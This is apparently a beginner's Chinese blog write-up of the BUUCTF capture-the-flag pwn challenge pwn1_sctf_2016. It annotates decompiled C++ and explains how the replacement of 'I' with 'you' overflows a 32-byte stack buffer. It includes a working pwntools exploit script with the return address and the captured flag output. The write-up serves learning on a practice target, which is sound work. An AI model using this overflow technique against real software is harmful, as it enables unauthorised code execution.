[BUUCTF]pwn: pwn1_sctf_2016


今天刚刚开始学习pwn,这道题主要是代码没看明白,如下图。

我是真没看出来那一堆std::干了什么事。后来看wp,明白是把s里的I换成you,但还是不明白每行代码什么意思,硬猜了一下:

int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);
  std::string::operator=(&input, s);        // &input = s
  std::allocator<char>::allocator(&v5);     // 没太懂,给V5分配内存?
  std::string::string(v4, "you", &v5);      // v4 = "you"
  std::allocator<char>::allocator(v7);      // 仍然不懂
  std::string::string(v6, "I", v7);         // v6 = "I"
  replace((std::string *)v3);               // 不懂,猜测是 v3 相当于replace?
  std::string::operator=(&input, v3, v6, v4);   // &input = v3(v6, v4) = replace("I", "you") ??
  std::string::~string(v3);                 // 下面都是析构函数
  std::string::~string(v6);                 
  std::allocator<char>::~allocator(v7);     
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);    // 应该是v0 = &input
  strcpy(s, v0);
  return printf("So, %s\n", s);
}

能看懂代码就很简单了,s只能输入32个字符,但s离跳转点有0x3C + 4 = 64个字节,所以只要输入20个I,变成20个you,再随便补4个字节就行了。下面是exp。

from pwn import *
p = remote("node4.buuoj.cn", 26877)
pl = b'I'*20 + b'a'*4 + p32(0x8048F0D)
p.sendline(pl)
print(p.recv())
# p.interactive()

# (.venv) rock@ubuntu:~/ctf/cpp$ /home/rock/ctf/.venv/bin/python /home/rock/ctf/pwn1_sctf_2016.py
# [+] Opening connection to node4.buuoj.cn on port 26877: Done
# b'flag{a932e92b-a779-4cc4-9d06-85f61fe32b37}\n'
# [*] Closed connection to node4.buuoj.cn port 26877

C++库的详解在这里:https://cplusplus.com/reference/

,

发表回复

您的电子邮箱地址不会被公开。